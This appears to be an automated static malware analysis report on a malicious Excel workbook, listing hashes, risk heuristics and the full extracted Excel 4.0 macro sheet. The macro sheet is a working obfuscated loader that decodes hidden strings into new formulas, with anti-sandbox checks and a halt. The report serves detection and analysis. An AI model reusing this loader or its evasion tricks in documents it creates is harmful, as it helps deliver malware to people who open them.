Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 794406d28d1b67c9…

MALICIOUS

Office (OOXML)

16.9 KB Created: 2020-11-13 09:40:43 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-11-23
MD5: 4d552c7dc5178ae4f75543d8e4deca54 SHA-1: 68857f687b99266d1fa2502f69c6e4669cfdfb69 SHA-256: 794406d28d1b67c92060e6d091e9b48b7b107406b10c3d2457c0a7d5edcc9e30
182 Risk Score

Heuristics 4

  • Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME
    Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
  • Dangerous XLM formula APIs: RETURN, HALT critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 10574 bytes
SHA-256: 52a9f8ae25a8b74e55208806289227a5c8fcc8feb590c23773cd4b72de3ee5c9
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{8FC3D49C-8A43-4AAE-B73E-3B24754312FA}"><dimension ref="I80:K217"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><sheetData><row r="80" spans="9:9" x14ac:dyDescent="0.25"><c r="I80" t="s"><v>0</v></c></row><row r="81" spans="9:11" x14ac:dyDescent="0.25"><c r="I81" t="s"><v>1</v></c></row><row r="82" spans="9:11" x14ac:dyDescent="0.25"><c r="I82" t="b"><f bx="1">cYQEBo=((PRODUCT((FALSE),((1))))+0)</f><v>0</v></c></row><row r="84" spans="9:11" x14ac:dyDescent="0.25"><c r="I84" t="b"><f bx="1">xfUfiZbKpM=cYQEBo</f><v>0</v></c></row><row r="85" spans="9:11" x14ac:dyDescent="0.25"><c r="I85" t="s"><v>2</v></c></row><row r="86" spans="9:11" x14ac:dyDescent="0.25"><c r="I86"><v>-403</v></c></row><row r="87" spans="9:11" x14ac:dyDescent="0.25"><c r="I87" t="s"><v>3</v></c></row><row r="89" spans="9:11" x14ac:dyDescent="0.25"><c r="I89" t="b"><f bx="1">NLjSfaW=cYQEBo</f><v>0</v></c><c r="K89"><v>100</v></c></row><row r="90" spans="9:11" x14ac:dyDescent="0.25"><c r="K90"><v>103</v></c></row><row r="91" spans="9:11" x14ac:dyDescent="0.25"><c r="I91"><v>644</v></c><c r="K91"><v>105</v></c></row><row r="92" spans="9:11" x14ac:dyDescent="0.25"><c r="K92"><v>122</v></c></row><row r="93" spans="9:11" x14ac:dyDescent="0.25"><c r="K93"><v>100</v></c></row><row r="94" spans="9:11" x14ac:dyDescent="0.25"><c r="I94" t="b"><f bx="1">IdUwiwrS=ROWS(evslvKcCjc&amp;"")</f><v>0</v></c><c r="K94"><v>102</v></c></row><row r="95" spans="9:11" x14ac:dyDescent="0.25"><c r="K95"><v>112</v></c></row><row r="96" spans="9:11" x14ac:dyDescent="0.25"><c r="K96"><v>96</v></c></row><row r="97" spans="9:11" x14ac:dyDescent="0.25"><c r="I97" t="s"><v>4</v></c><c r="K97"><v>111</v></c></row><row r="98" spans="9:11" x14ac:dyDescent="0.25"><c r="K98"><v>115</v></c></row><row r="99" spans="9:11" x14ac:dyDescent="0.25"><c r="I99" t="b"><f bx="1">PWlCheeSlRq=ROWS(CZUHFMbC&amp;"")</f><v>0</v></c></row><row r="101" spans="9:11" x14ac:dyDescent="0.25"><c r="I101"><v>-389</v></c></row><row r="103" spans="9:11" x14ac:dyDescent="0.25"><c r="I103" t="b"><f>WHILE(NOT(ABS(xfUfiZbKpM)&gt;=ABS(IdUwiwrS)))</f><v>0</v></c></row><row r="104" spans="9:11" x14ac:dyDescent="0.25"><c r="I104"><v>618</v></c></row><row r="105" spans="9:11" x14ac:dyDescent="0.25"><c r="I105"><v>-483</v></c></row><row r="106" spans="9:11" x14ac:dyDescent="0.25"><c r="I106" t="b"><f bx="1">zrLSimah=""</f><v>0</v></c></row><row r="109" spans="9:11" x14ac:dyDescent="0.25"><c r="I109"><v>900</v></c></row><row r="110" spans="9:11" x14ac:dyDescent="0.25"><c r="I110" t="b"><f bx="1">xfUfiZbKpM=xfUfiZbKpM+1</f><v>0</v></c></row><row r="112" spans="9:11" x14ac:dyDescent="0.25"><c r="I112" t="s"><v>5</v></c></row><row r="113" spans="9:9" x14ac:dyDescent="0.25"><c r="I113" t="b"><f bx="1">lwnEtYVFW=INDEX(evslvKcCjc,xfUfiZbKpM)</f><v>0</v></c></row><row r="114" spans="9:9" x14ac:dyDescent="0.25"><c r="I114"><v>-261</v></c></row><row r="115" spans="9:9" x14ac:dyDescent="0.25"><c r="I115" t="b"><f bx="1">NcVYeqxBAocv=LEN(lwnEtYVFW)</f><v>0</v></c></row><row r="117" spans="9:9" x14ac:dyDescent="0.25"><c r="I117" t="s"><v>6</v></c></row><row r="118" spans="9:9" x14ac:dyDescent="0.25"><c r="I118"><v>-273</v></c></row><row r="119" spans="9:9" x14ac:dyDescent="0.25"><c r="I119" t="b"><f bx="1">hVNYCtAfEtX=cYQEBo</f><v>0</v></c></row><row r="122" spans="9:9" x14ac:dyDescent="0.25"><c r="I122" t="s"><v>7</v></c></row><row r="123" spans="9:9" x14ac:dyDescent="0.25"><c r="I123" t="b"><f>WHILE(NOT(ABS(hVNYCtAfEtX)&gt;=ABS(NcVYeqxBAocv)))</f><v>0</v></c></row><row r="124" spans="9:9" x14ac:dyDescent="0.25"><c r="I124"><v>451</v></c></row><row r="126" spans="9:9" x14ac:dyDescent="0.25"><c r="I126"><v>301</v></c></row><row r="127" spans="9:9" x14ac:dyDescent="0.25"><c r="I127" t="b"><f bx="1">hVNYCtAfEtX=hVNYCtAfEtX+1</f><v>0</v></c></row><row r="128" spans="9:9" x14ac:dyDescent="0.25"><c r="I128" t="s"><v>8</v></c></row><row r="129" spans="9:9" x14ac:dyDescent="0.25"><c r="I129" t="b"><f bx="1">RUCnaWPqUQu=MID(lwnEtYVFW,hVNYCtAfEtX,1)</f><v>0</v></c></row><row r="131" spans="9:9" x14ac:dyDescent="0.25"><c r="I131" t="s"><v>9</v></c></row><row r="133" spans="9:9" x14ac:dyDescent="0.25"><c r="I133" t="s"><v>10</v></c></row><row r="134" spans="9:9" x14ac:dyDescent="0.25"><c r="I134" t="b"><f bx="1">iCPWnF=CODE(RUCnaWPqUQu)</f><v>0</v></c></row><row r="136" spans="9:9" x14ac:dyDescent="0.25"><c r="I136"><v>-608</v></c></row><row r="137" spans="9:9" x14ac:dyDescent="0.25"><c r="I137"><v>475</v></c></row><row r="138" spans="9:9" x14ac:dyDescent="0.25"><c r="I138" t="b"><f bx="1">ZzHsdW=MOD(NLjSfaW,PWlCheeSlRq)+1</f><v>0</v></c></row><row r="139" spans="9:9" x14ac:dyDescent="0.25"><c r="I139" t="s"><v>11</v></c></row><row r="141" spans="9:9" x14ac:dyDescent="0.25"><c r="I141" t="b"><f bx="1">VbkccSvg=INDEX(CZUHFMbC,ZzHsdW)</f><v>0</v></c></row><row r="143" spans="9:9" x14ac:dyDescent="0.25"><c r="I143" t="b"><f bx="1">JSJIZbcTzcd=T(CHAR(INT(ROUNDUP(iCPWnF,0)-ROUNDUP(VbkccSvg,0))))</f><v>0</v></c></row><row r="146" spans="9:9" x14ac:dyDescent="0.25"><c r="I146" t="b"><f bx="1">zrLSimah=zrLSimah&amp;JSJIZbcTzcd</f><v>0</v></c></row><row r="149" spans="9:9" x14ac:dyDescent="0.25"><c r="I149" t="s"><v>12</v></c></row><row r="150" spans="9:9" x14ac:dyDescent="0.25"><c r="I150" t="b"><f bx="1">NLjSfaW=NLjSfaW+1</f><v>0</v></c></row><row r="151" spans="9:9" x14ac:dyDescent="0.25"><c r="I151" t="s"><v>13</v></c></row><row r="152" spans="9:9" x14ac:dyDescent="0.25"><c r="I152" t="b"><f>NEXT()</f><v>0</v></c></row><row r="154" spans="9:9" x14ac:dyDescent="0.25"><c r="I154"><v>-330</v></c></row><row r="155" spans="9:9" x14ac:dyDescent="0.25"><c r="I155" t="b"><f bx="1">ePIegKQn=ADDRESS(nDRSvHzIYC,PuOjl,,FALSE,"QrSjqJsOmk")</f><v>0</v></c></row><row r="156" spans="9:9" x14ac:dyDescent="0.25"><c r="I156"><v>128</v></c></row><row r="157" spans="9:9" x14ac:dyDescent="0.25"><c r="I157" t="s"><v>14</v></c></row><row r="160" spans="9:9" x14ac:dyDescent="0.25"><c r="I160" t="e"><f>INT(T(FORMULA.FILL(T(zrLSimah)&amp;"",""&amp;T(ePIegKQn))))</f><v>#VALUE!</v></c></row><row r="161" spans="9:9" x14ac:dyDescent="0.25"><c r="I161"><v>-705</v></c></row><row r="162" spans="9:9" x14ac:dyDescent="0.25"><c r="I162"><v>-620</v></c></row><row r="163" spans="9:9" x14ac:dyDescent="0.25"><c r="I163" t="b"><f bx="1">nDRSvHzIYC=nDRSvHzIYC+1</f><v>0</v></c></row><row r="165" spans="9:9" x14ac:dyDescent="0.25"><c r="I165"><v>-805</v></c></row><row r="166" spans="9:9" x14ac:dyDescent="0.25"><c r="I166" t="b"><f>NEXT()</f><v>0</v></c></row><row r="168" spans="9:9" x14ac:dyDescent="0.25"><c r="I168"><v>287</v></c></row><row r="169" spans="9:9" x14ac:dyDescent="0.25"><c r="I169"><v>100</v></c></row><row r="170" spans="9:9" x14ac:dyDescent="0.25"><c r="I170" t="b"><f>RETURN()</f><v>0</v></c></row><row r="171" spans="9:9" x14ac:dyDescent="0.25"><c r="I171"><v>688</v></c></row><row r="172" spans="9:9" x14ac:dyDescent="0.25"><c r="I172" t="s"><v>15</v></c></row><row r="173" spans="9:9" x14ac:dyDescent="0.25"><c r="I173"><v>986</v></c></row><row r="174" spans="9:9" x14ac:dyDescent="0.25"><c r="I174"><v>843</v></c></row><row r="176" spans="9:9" x14ac:dyDescent="0.25"><c r="I176"><v>887</v></c></row><row r="177" spans="9:9" x14ac:dyDescent="0.25"><c r="I177" t="s"><v>16</v></c></row><row r="180" spans="9:9" x14ac:dyDescent="0.25"><c r="I180"><v>51</v></c></row><row r="183" spans="9:9" x14ac:dyDescent="0.25"><c r="I183" t="s"><v>17</v></c></row><row r="184" spans="9:9" x14ac:dyDescent="0.25"><c r="I184" t="s"><v>18</v></c></row><row r="187" spans="9:9" x14ac:dyDescent="0.25"><c r="I187" t="b"><f bx="1">vHetihttDYnW=GET.WORKSPACE(VALUE("42"))</f><v>0</v></c></row><row r="189" spans="9:9" x14ac:dyDescent="0.25"><c r="I189" t="b"><f bx="1">LzRRTKDzj=NOT(GET.WORKSPACE(VALUE("31")))</f><v>0</v></c></row><row r="191" spans="9:9" x14ac:dyDescent="0.25"><c r="I191" t="s"><v>19</v></c></row><row r="192" spans="9:9" x14ac:dyDescent="0.25"><c r="I192"><v>560</v></c></row><row r="193" spans="9:9" x14ac:dyDescent="0.25"><c r="I193" t="b"><f bx="1">SPVjXXCKc=GET.WORKSPACE(VALUE("19"))</f><v>0</v></c></row><row r="196" spans="9:9" x14ac:dyDescent="0.25"><c r="I196" t="e"><f>IF(AND(vHetihttDYnW,LzRRTKDzj,SPVjXXCKc),,HALT())</f><v>#NAME?</v></c></row><row r="197" spans="9:9" x14ac:dyDescent="0.25"><c r="I197" t="s"><v>20</v></c></row><row r="198" spans="9:9" x14ac:dyDescent="0.25"><c r="I198" t="s"><v>21</v></c></row><row r="199" spans="9:9" x14ac:dyDescent="0.25"><c r="I199" t="b"><f bx="1">zYVFOeetCLtr=$I$82</f><v>0</v></c></row><row r="200" spans="9:9" x14ac:dyDescent="0.25"><c r="I200"><v>-348</v></c></row><row r="203" spans="9:9" x14ac:dyDescent="0.25"><c r="I203" t="b"><f bx="1">evslvKcCjc=Sheet1!$B$81:$B$133</f><v>0</v></c></row><row r="205" spans="9:9" x14ac:dyDescent="0.25"><c r="I205" t="s"><v>22</v></c></row><row r="207" spans="9:9" x14ac:dyDescent="0.25"><c r="I207" t="b"><f bx="1">CZUHFMbC=$K$89:$K$98</f><v>0</v></c></row><row r="208" spans="9:9" x14ac:dyDescent="0.25"><c r="I208" t="s"><v>23</v></c></row><row r="209" spans="9:9" x14ac:dyDescent="0.25"><c r="I209"><v>643</v></c></row><row r="211" spans="9:9" x14ac:dyDescent="0.25"><c r="I211" t="b"><f bx="1">nDRSvHzIYC=217</f><v>0</v></c></row><row r="212" spans="9:9" x14ac:dyDescent="0.25"><c r="I212" t="s"><v>24</v></c></row><row r="213" spans="9:9" x14ac:dyDescent="0.25"><c r="I213" t="b"><f bx="1">PuOjl=9</f><v>0</v></c></row><row r="216" spans="9:9" x14ac:dyDescent="0.25"><c r="I216" t="e"><f>zYVFOeetCLtr()</f><v>#NAME?</v></c></row><row r="217" spans="9:9" x14ac:dyDescent="0.25"><c r="I217" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>